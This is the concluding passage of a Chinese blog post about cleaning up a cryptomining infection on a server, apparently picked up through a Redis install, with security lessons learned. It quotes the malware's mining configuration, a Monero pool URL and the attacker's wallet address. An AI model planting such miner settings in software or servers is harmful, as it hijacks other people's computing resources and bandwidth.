  终于分析完这个黑客程序的大致流程并把他启的各个线程干掉,下载的个个文件干掉。分析最开始中毒可能是由于安装redis的时候不小心怎么调用了这个程序,如果没有阿里云预警可能一直没有办法发现就一直被占用资源占用带宽,以后安装程序还是尽量走官方途径服务器也开启秘钥方式登录比较好,还有就是一些脚本程序后台程序如果用不到就尽量不装。总之感觉经历一次服务器被黑并深入看他的代码感觉成长还是比较大的。然后就是这里面的一些代码和shell脚本存放地址都是一些三方机构的还是没有能找到黑客自己的地址感觉也是很遗憾的可能和放在可执行文件里面或者和"url": "stratum+tcp://xmr.f2pool.com:13531","user":"47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.xmrig"有关。

猜你喜欢

转载自blog.csdn.net/FYuu95100/article/details/82351619
今日推荐
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
开放签电子签章:停止新增,优化体验,前进更进(五一假期前工作)
开源日报 | 中学生开源前端动画引擎;全球首个Llama3 8B中文版开源模型;联想电脑恐出局;Linus讽刺AI炒作
周排行
浏览器对同一域名进行请求的最大并发连接数
React Hook之自定义Hook
【转】MyBatis缓存机制
-Java-泛型
自动化测试常用脚本-发送邮件
LeetCode#859: Buddy Strings
java、Python处理字符串
第二篇の博客
Hadoop伪分布式环境安装
SQL Server进阶(十一)临时表、表变量
每日归档
更多
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022